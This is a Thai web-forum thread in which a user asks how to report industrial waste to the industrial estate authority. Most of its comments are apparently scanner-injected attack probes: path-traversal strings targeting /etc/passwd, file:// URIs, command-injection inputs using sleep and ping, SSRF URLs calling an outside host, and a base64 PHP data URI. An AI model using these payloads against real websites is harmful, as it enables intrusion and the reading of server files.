รายละเอียดเว็บบอร์ด

หัวข้อ -> สอบถามเรื่องการส่งเอกสารรายงานขยะ กนอ
 
เราต้องรายงานอะไรบ้างคะ เรายังไม่ได้ยื่นขอเลข 13 หลัก ยังไม่มีการขนขยะอันตราย เราต้องรายงานแบบไหนคะ
 
ผู้ตั้ง : สุจิตรา เจริญสุข วันที่ : 21 ก.พ. 59 21:30:21 น. ผู้ชม : 13,502
 

แสดงความคิดเห็น

ความคิดเห็น : กรอกความคิดเห็นค่ะ
ชื่อผู้ตั้ง : กรอกชื่อผู้ตั้งค่ะ
กรอกรหัสป้องกัน
 

ความคิดเห็น

ความคิดเห็นที่ 249
https://wapiti3.ovh/ssrf/16w6e4/308/746e6f7465/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:33:09 น.
 
ความคิดเห็นที่ 248
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:33:09 น.
 
ความคิดเห็นที่ 247
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/ssrf/16w6e4/308/746e616d65/ วันที่ : 09 ส.ค. 64 13:33:09 น.
 
ความคิดเห็นที่ 246
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:23:58 น.
 
ความคิดเห็นที่ 245
ww5baxpfjd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:23:56 น.
 
ความคิดเห็นที่ 244
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:23:55 น.
 
ความคิดเห็นที่ 243
Hi there!
 
ผู้ตั้ง : วันที่ : 09 ส.ค. 64 13:23:55 น.
 
ความคิดเห็นที่ 242
Hi there!
 
ผู้ตั้ง : wpcy3mclnc วันที่ : 09 ส.ค. 64 13:23:53 น.
 
ความคิดเห็นที่ 241
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 13:09:13 น.
 
ความคิดเห็นที่ 240
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:42 น.
 
ความคิดเห็นที่ 239
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:42 น.
 
ความคิดเห็นที่ 238
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:41 น.
 
ความคิดเห็นที่ 237
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:41 น.
 
ความคิดเห็นที่ 236
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:41 น.
 
ความคิดเห็นที่ 235
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:41 น.
 
ความคิดเห็นที่ 234
file://C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:40 น.
 
ความคิดเห็นที่ 233
file:///etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:40 น.
 
ความคิดเห็นที่ 232
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:40 น.
 
ความคิดเห็นที่ 231
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:39 น.
 
ความคิดเห็นที่ 230
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:39 น.
 
ความคิดเห็นที่ 229
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:39 น.
 
ความคิดเห็นที่ 228
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:38 น.
 
ความคิดเห็นที่ 227
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:38 น.
 
ความคิดเห็นที่ 226
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:37 น.
 
ความคิดเห็นที่ 225
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:37 น.
 
ความคิดเห็นที่ 224
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:37 น.
 
ความคิดเห็นที่ 223
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:37 น.
 
ความคิดเห็นที่ 222
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:36 น.
 
ความคิดเห็นที่ 221
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:36 น.
 
ความคิดเห็นที่ 220
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:36 น.
 
ความคิดเห็นที่ 219
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:36 น.
 
ความคิดเห็นที่ 218
Hi there!/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:35 น.
 
ความคิดเห็นที่ 217
Hi there!/../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:35 น.
 
ความคิดเห็นที่ 216
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:34 น.
 
ความคิดเห็นที่ 215
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:34 น.
 
ความคิดเห็นที่ 214
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:34 น.
 
ความคิดเห็นที่ 213
Hi there!/../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:33 น.
 
ความคิดเห็นที่ 212
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:33 น.
 
ความคิดเห็นที่ 211
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:32 น.
 
ความคิดเห็นที่ 210
Hi there!/../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:32 น.
 
ความคิดเห็นที่ 209
Hi there!/../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:32 น.
 
ความคิดเห็นที่ 208
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:31 น.
 
ความคิดเห็นที่ 207
../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:31 น.
 
ความคิดเห็นที่ 206
../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:31 น.
 
ความคิดเห็นที่ 205
../../../../../../../../../../Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:30 น.
 
ความคิดเห็นที่ 204
../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:30 น.
 
ความคิดเห็นที่ 203
../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:30 น.
 
ความคิดเห็นที่ 202
../../../../../../../../../../../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:30 น.
 
ความคิดเห็นที่ 201
../../../../../../../../../../etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:29 น.
 
ความคิดเห็นที่ 200
../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:29 น.
 
ความคิดเห็นที่ 199
../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:29 น.
 
ความคิดเห็นที่ 198
../../../../../../../../../../../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:29 น.
 
ความคิดเห็นที่ 197
../../../../../../../../../../etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:28 น.
 
ความคิดเห็นที่ 196
../../../../../../../../../../windows/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:28 น.
 
ความคิดเห็นที่ 195
../../../../../../../../../../lib/
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:28 น.
 
ความคิดเห็นที่ 194
C:/Windows/System32/drivers/etc/services::$DATA
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:27 น.
 
ความคิดเห็นที่ 193
C:/Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:27 น.
 
ความคิดเห็นที่ 192
C:/Windows/System32/drivers/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:27 น.
 
ความคิดเห็นที่ 191
C:WindowsSystem32driversetcservices::$DATA
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:26 น.
 
ความคิดเห็นที่ 190
C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:26 น.
 
ความคิดเห็นที่ 189
C:WindowsSystem32driversetcservices
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:25 น.
 
ความคิดเห็นที่ 188
/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:25 น.
 
ความคิดเห็นที่ 187
/etc/services
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:24 น.
 
ความคิดเห็นที่ 186
/etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:24 น.
 
ความคิดเห็นที่ 185
/etc/passwd
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:23 น.
 
ความคิดเห็นที่ 184
https://wapiti3.ovh/e.php
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:23 น.
 
ความคิดเห็นที่ 183
https://wapiti3.ovh/e.php
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:21 น.
 
ความคิดเห็นที่ 182
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:21 น.
 
ความคิดเห็นที่ 181
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:20 น.
 
ความคิดเห็นที่ 180
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:18 น.
 
ความคิดเห็นที่ 179
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:18 น.
 
ความคิดเห็นที่ 178
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:17 น.
 
ความคิดเห็นที่ 177
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:17 น.
 
ความคิดเห็นที่ 176
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:17 น.
 
ความคิดเห็นที่ 175
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:16 น.
 
ความคิดเห็นที่ 174
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:16 น.
 
ความคิดเห็นที่ 173
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:16 น.
 
ความคิดเห็นที่ 172
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:15 น.
 
ความคิดเห็นที่ 171
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:15 น.
 
ความคิดเห็นที่ 170
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:15 น.
 
ความคิดเห็นที่ 169
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:14 น.
 
ความคิดเห็นที่ 168
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:14 น.
 
ความคิดเห็นที่ 167
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:14 น.
 
ความคิดเห็นที่ 166
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:13 น.
 
ความคิดเห็นที่ 165
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:13 น.
 
ความคิดเห็นที่ 164
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:12 น.
 
ความคิดเห็นที่ 163
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:12 น.
 
ความคิดเห็นที่ 162
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:12 น.
 
ความคิดเห็นที่ 161
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:11 น.
 
ความคิดเห็นที่ 160
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:11 น.
 
ความคิดเห็นที่ 159
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:11 น.
 
ความคิดเห็นที่ 158
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:10 น.
 
ความคิดเห็นที่ 157
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:10 น.
 
ความคิดเห็นที่ 156
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:10 น.
 
ความคิดเห็นที่ 155
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:10 น.
 
ความคิดเห็นที่ 154
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:09 น.
 
ความคิดเห็นที่ 153
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:09 น.
 
ความคิดเห็นที่ 152
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:09 น.
 
ความคิดเห็นที่ 151
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:08 น.
 
ความคิดเห็นที่ 150
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:08 น.
 
ความคิดเห็นที่ 149
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:07 น.
 
ความคิดเห็นที่ 148
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:07 น.
 
ความคิดเห็นที่ 147
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:06 น.
 
ความคิดเห็นที่ 146
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:06 น.
 
ความคิดเห็นที่ 145
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:05 น.
 
ความคิดเห็นที่ 144
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:05 น.
 
ความคิดเห็นที่ 143
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:04 น.
 
ความคิดเห็นที่ 142
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:04 น.
 
ความคิดเห็นที่ 141
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:04 น.
 
ความคิดเห็นที่ 140
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:03 น.
 
ความคิดเห็นที่ 139
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:03 น.
 
ความคิดเห็นที่ 138
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:03 น.
 
ความคิดเห็นที่ 137
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:03 น.
 
ความคิดเห็นที่ 136
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:02 น.
 
ความคิดเห็นที่ 135
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:02 น.
 
ความคิดเห็นที่ 134
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:02 น.
 
ความคิดเห็นที่ 133
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:02 น.
 
ความคิดเห็นที่ 132
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:01 น.
 
ความคิดเห็นที่ 131
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:01 น.
 
ความคิดเห็นที่ 130
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:01 น.
 
ความคิดเห็นที่ 129
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:00 น.
 
ความคิดเห็นที่ 128
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:00 น.
 
ความคิดเห็นที่ 127
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:03:00 น.
 
ความคิดเห็นที่ 126
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:02:59 น.
 
ความคิดเห็นที่ 125
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 11:02:59 น.
 
ความคิดเห็นที่ 124
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:02:59 น.
 
ความคิดเห็นที่ 123
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:02:58 น.
 
ความคิดเห็นที่ 122
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:02:58 น.
 
ความคิดเห็นที่ 121
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:02:57 น.
 
ความคิดเห็นที่ 120
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:02:56 น.
 
ความคิดเห็นที่ 119
Hi there!
 
ผู้ตั้ง : ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//.... วันที่ : 09 ส.ค. 64 11:02:56 น.
 
ความคิดเห็นที่ 118
Hi there!
 
ผู้ตั้ง : file://C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 11:02:56 น.
 
ความคิดเห็นที่ 117
Hi there!
 
ผู้ตั้ง : file:///etc/passwd วันที่ : 09 ส.ค. 64 11:02:56 น.
 
ความคิดเห็นที่ 116
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:02:55 น.
 
ความคิดเห็นที่ 115
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:55 น.
 
ความคิดเห็นที่ 114
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:02:55 น.
 
ความคิดเห็นที่ 113
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:55 น.
 
ความคิดเห็นที่ 112
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:54 น.
 
ความคิดเห็นที่ 111
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:54 น.
 
ความคิดเห็นที่ 110
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:54 น.
 
ความคิดเห็นที่ 109
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:53 น.
 
ความคิดเห็นที่ 108
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:53 น.
 
ความคิดเห็นที่ 107
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:53 น.
 
ความคิดเห็นที่ 106
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:52 น.
 
ความคิดเห็นที่ 105
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:52 น.
 
ความคิดเห็นที่ 104
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:02:52 น.
 
ความคิดเห็นที่ 103
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:51 น.
 
ความคิดเห็นที่ 102
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 11:02:51 น.
 
ความคิดเห็นที่ 101
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:51 น.
 
ความคิดเห็นที่ 100
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:50 น.
 
ความคิดเห็นที่ 99
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:50 น.
 
ความคิดเห็นที่ 98
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:50 น.
 
ความคิดเห็นที่ 97
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:49 น.
 
ความคิดเห็นที่ 96
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:49 น.
 
ความคิดเห็นที่ 95
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:49 น.
 
ความคิดเห็นที่ 94
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:49 น.
 
ความคิดเห็นที่ 93
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:48 น.
 
ความคิดเห็นที่ 92
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:48 น.
 
ความคิดเห็นที่ 91
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:48 น.
 
ความคิดเห็นที่ 90
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:47 น.
 
ความคิดเห็นที่ 89
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:47 น.
 
ความคิดเห็นที่ 88
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:47 น.
 
ความคิดเห็นที่ 87
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:47 น.
 
ความคิดเห็นที่ 86
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:46 น.
 
ความคิดเห็นที่ 85
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 11:02:46 น.
 
ความคิดเห็นที่ 84
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:46 น.
 
ความคิดเห็นที่ 83
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:45 น.
 
ความคิดเห็นที่ 82
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:45 น.
 
ความคิดเห็นที่ 81
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 11:02:45 น.
 
ความคิดเห็นที่ 80
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../windows/ วันที่ : 09 ส.ค. 64 11:02:45 น.
 
ความคิดเห็นที่ 79
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../lib/ วันที่ : 09 ส.ค. 64 11:02:44 น.
 
ความคิดเห็นที่ 78
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services::$DATA วันที่ : 09 ส.ค. 64 11:02:44 น.
 
ความคิดเห็นที่ 77
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:44 น.
 
ความคิดเห็นที่ 76
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 11:02:43 น.
 
ความคิดเห็นที่ 75
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices::$DATA วันที่ : 09 ส.ค. 64 11:02:43 น.
 
ความคิดเห็นที่ 74
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 11:02:43 น.
 
ความคิดเห็นที่ 73
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 11:02:42 น.
 
ความคิดเห็นที่ 72
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 11:02:42 น.
 
ความคิดเห็นที่ 71
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 11:02:42 น.
 
ความคิดเห็นที่ 70
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 11:02:42 น.
 
ความคิดเห็นที่ 69
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 11:02:41 น.
 
ความคิดเห็นที่ 68
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 11:02:41 น.
 
ความคิดเห็นที่ 67
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 11:02:41 น.
 
ความคิดเห็นที่ 66
&ping -n 25 127.0.0.1&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:06 น.
 
ความคิดเห็นที่ 65
a|sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:06 น.
 
ความคิดเห็นที่ 64
a;sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:06 น.
 
ความคิดเห็นที่ 63
a`sleep 60`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:05 น.
 
ความคิดเห็นที่ 62
a`)`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:04 น.
 
ความคิดเห็นที่ 61
data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==
 
